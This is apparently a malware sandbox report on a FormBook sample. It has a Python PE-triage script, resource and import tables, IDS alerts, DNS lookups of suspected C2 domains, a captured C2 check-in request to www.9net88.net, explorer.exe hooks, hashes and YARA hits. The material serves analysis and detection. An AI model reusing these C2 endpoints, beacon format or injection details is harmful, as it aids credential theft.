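        if s["va"] <= rva < s["va"] + max(s["vsize"], s["raw"]):
            return s["name"]
    return None


def decode_timestamp(ts):
    """TimeDateStamp is seconds since the Unix epoch. The field is trivially
    forgeable by the builder, so treat it as a claim, not as evidence."""
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0)."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def zlib_ratio(data):
    """Compressed/raw size at zlib level 9, used here as an analogue of the
    report's ZLIB Complexity column (assumption: the page does not define it)."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def is_signed(security_dir_size=SECURITY_DIR_SIZE):
    """An Authenticode signature lives in the SECURITY directory; size 0 means none."""
    return security_dir_size > 0


def triage(sections=SECTIONS, entropy_threshold=7.0):
    """Flag sections that commonly indicate packing or a self-decrypting payload.
    The 7.0 threshold is an assumption, not a value taken from the report."""
    return {
        "high_entropy": [s["name"] for s in sections if s["entropy"] >= entropy_threshold],
        "writable_executable": [s["name"] for s in sections
                                if {"IMAGE_SCN_MEM_WRITE", "IMAGE_SCN_MEM_EXECUTE"} <= s["flags"]],
        "unbacked": [s["name"] for s in sections if s["raw"] == 0 and s["vsize"] > 0],
    }


if __name__ == "__main__":
    print("entrypoint section:", section_for_va(ENTRYPOINT))
    print("timestamp:", decode_timestamp(TIMESTAMP).strftime("%a %b %d %H:%M:%S %Y UTC"))
    print("signed:", is_signed())
    print("triage:", triage())
```

On these values the entrypoint resolves to .text, the timestamp decodes to the same Sunday 3 November 2024 23:23:08 UTC the report prints, and the only flag raised is .rsrc. The resource table that follows shows why part of that entropy is benign (a 0x6ed1-byte PNG icon with ZLIB complexity 0.9985 sits in it), so a section-level flag like this is a pointer into the resource directory, not a verdict on its own.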
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc8650 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.5150709219858156
RT_ICON | 0xc8ab8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc8be0 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.37682926829268293
RT_ICON | 0xc9248 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.478494623655914
RT_ICON | 0xc9530 | 0x1e8 | Device independent bitmap graphic, 24 x 48 x 4, image size 288 | English | Great Britain | 0.514344262295082
RT_ICON | 0xc9718 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.49324324324324326
RT_ICON | 0xc9840 | 0x6ed1 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | Great Britain | 0.9985195107335472
RT_ICON | 0xd0714 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.570362473347548
RT_ICON | 0xd15bc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.6430505415162455
RT_ICON | 0xd1e64 | 0x6c8 | Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors | English | Great Britain | 0.5616359447004609
RT_ICON | 0xd252c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.4125722543352601
RT_ICON | 0xd2a94 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 67584 | English | Great Britain | 0.13950668401750857
RT_ICON | 0xe32bc | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 38016 | English | Great Britain | 0.22774332562539415
RT_ICON | 0xec764 | 0x67e8 | Device independent bitmap graphic, 80 x 160 x 32, image size 26560 | English | Great Britain | 0.23240601503759398
RT_ICON | 0xf2f4c | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 21600 | English | Great Britain | 0.25914972273567466
RT_ICON | 0xf83d4 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16896 | English | Great Britain | 0.24728389230042513
RT_ICON | 0xfc5fc | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.3354771784232365
RT_ICON | 0xfeba4 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.3778142589118199
RT_STRING | 0xffc4c | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0x1001e0 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0x10086c | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0x100cfc | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0x1012f8 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0x101954 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0x101dbc | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0x101f14 | 0x455ac | data | | | 1.0003379377349724
RT_GROUP_ICON | 0x1474c0 | 0x102 | data | English | Great Britain | 0.6124031007751938
RT_GROUP_ICON | 0x1475c4 | 0x14 | data | English | Great Britain | 1.15
RT_VERSION | 0x1475d8 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1476b4 | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-11-04T03:14:22.217043+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49706 | TCP
2024-11-04T03:14:39.357291+0100 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49796 | 199.59.243.227 | 80 | TCP
2024-11-04T03:14:39.357291+0100 | 2031449 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49796 | 199.59.243.227 | 80 | TCP
2024-11-04T03:14:39.357291+0100 | 2031453 | ET MALWARE FormBook CnC Checkin (GET) | 1 | 192.168.2.5 | 49796 | 199.59.243.227 | 80 | TCP
2024-11-04T03:15:01.278188+0100 | 2022930 | ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow | 1 | 4.245.163.56 | 443 | 192.168.2.5 | 49902 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 4, 2024 03:14:38.662542105 CET | 192.168.2.5 | 1.1.1.1 | 0x56c | Standard query (0) | www.9net88.net | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:14:59.505573988 CET | 192.168.2.5 | 1.1.1.1 | 0xe87a | Standard query (0) | www.lasterdeals.shop | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:15:18.974359989 CET | 192.168.2.5 | 1.1.1.1 | 0x8175 | Standard query (0) | www.eloshost.xyz | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:15:39.709173918 CET | 192.168.2.5 | 1.1.1.1 | 0x4644 | Standard query (0) | www.lray-civil.xyz | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:00.523462057 CET | 192.168.2.5 | 1.1.1.1 | 0x799 | Standard query (0) | www.ool-covers76.xyz | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:21.183387995 CET | 192.168.2.5 | 1.1.1.1 | 0x453b | Standard query (0) | www.azl.pro | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:41.711688042 CET | 192.168.2.5 | 1.1.1.1 | 0xf047 | Standard query (0) | www.ithin-ksvodn.xyz | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:02.675270081 CET | 192.168.2.5 | 1.1.1.1 | 0xaa71 | Standard query (0) | www.g18q11a.top | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:03.661868095 CET | 192.168.2.5 | 1.1.1.1 | 0xaa71 | Standard query (0) | www.g18q11a.top | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:23.400170088 CET | 192.168.2.5 | 1.1.1.1 | 0xc5fb | Standard query (0) | www.rowadservepros.net | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:18:06.021836042 CET | 192.168.2.5 | 1.1.1.1 | 0x2fb3 | Standard query (0) | www.ridesmaidgiftsboutiqueki.shop | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:18:27.708919048 CET | 192.168.2.5 | 1.1.1.1 | 0xde4a | Standard query (0) | www.elonix-traceglow.pro | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 4, 2024 03:14:38.853774071 CET | 1.1.1.1 | 192.168.2.5 | 0x56c | No error (0) | www.9net88.net | 94950.bodis.com | | CNAME (Canonical name) | IN (0x0001) | false
Nov 4, 2024 03:14:38.853774071 CET | 1.1.1.1 | 192.168.2.5 | 0x56c | No error (0) | 94950.bodis.com | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:14:59.515199900 CET | 1.1.1.1 | 192.168.2.5 | 0xe87a | Name error (3) | www.lasterdeals.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:15:18.983366966 CET | 1.1.1.1 | 192.168.2.5 | 0x8175 | Name error (3) | www.eloshost.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:15:39.717786074 CET | 1.1.1.1 | 192.168.2.5 | 0x4644 | Name error (3) | www.lray-civil.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:00.547622919 CET | 1.1.1.1 | 192.168.2.5 | 0x799 | Name error (3) | www.ool-covers76.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:21.191365957 CET | 1.1.1.1 | 192.168.2.5 | 0x453b | Name error (3) | www.azl.pro | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:16:41.728069067 CET | 1.1.1.1 | 192.168.2.5 | 0xf047 | Name error (3) | www.ithin-ksvodn.xyz | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:03.788278103 CET | 1.1.1.1 | 192.168.2.5 | 0xaa71 | Name error (3) | www.g18q11a.top | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:03.788292885 CET | 1.1.1.1 | 192.168.2.5 | 0xaa71 | Name error (3) | www.g18q11a.top | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:17:23.409156084 CET | 1.1.1.1 | 192.168.2.5 | 0xc5fb | Name error (3) | www.rowadservepros.net | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:18:06.030236959 CET | 1.1.1.1 | 192.168.2.5 | 0x2fb3 | Name error (3) | www.ridesmaidgiftsboutiqueki.shop | none | none | A (IP address) | IN (0x0001) | false
Nov 4, 2024 03:18:27.724127054 CET | 1.1.1.1 | 192.168.2.5 | 0xde4a | Name error (3) | www.elonix-traceglow.pro | none | none | A (IP address) | IN (0x0001) | false
• www.9net88.net

Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49796 | 199.59.243.227 | 80 | 1028 | C:\Windows\explorer.exe

Timestamp | Bytes transferred | Direction | Data
Nov 4, 2024 03:14:38.859510899 CET | 158 | OUT | GET /ge07/?O2MHn=rInKjcO63u4K1THTAINFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22uvGPLor/dpE&uVuD=ApWHHF HTTP/1.1
Host: www.9net88.net
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:


Code Manipulations

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE4
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE4
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE4
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE4


Target ID: 0
Start time: 21:13:59
Start date: 03/11/2024
Path: C:\Users\user\Desktop\PI916810.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PI916810.exe"
Imagebase: 0x460000
File size: 1'352'192 bytes
MD5 hash: DC96F5AE5ADE3E42324FA9C34BC6A43D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.2042338339.0000000001A00000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low
Has exited: true

Target ID: 2
Start time: 21:14:00
Start date: 03/11/2024
Path: C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\Desktop\PI916810.exe"
Imagebase: 0x8d0000
File size: 46'504 bytes
MD5 hash: 1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2090686862.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2091243380.0000000003840000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000002.00000002.2091165777.00000000035D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: high
Has exited: true

Target ID: 3
Start time: 21:14:02
Start date: 03/11/2024
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff674740000
File size: 5'141'208 bytes
MD5 hash: 662F4F92FDE3557E86D110526BB578D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: false

Target ID: 4
Start time: 21:14:04
Start date: 03/11/2024
Path: C:\Windows\SysWOW64\WWAHost.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\SysWOW64\WWAHost.exe"
Imagebase: 0x260000
File size: 886'080 bytes
MD5 hash: 7C7EDAD5BDA9C34FD50C3A58429C90F0
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486857852.0000000002800000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.4486904859.0000000002830000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4486513656.0000000000210000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
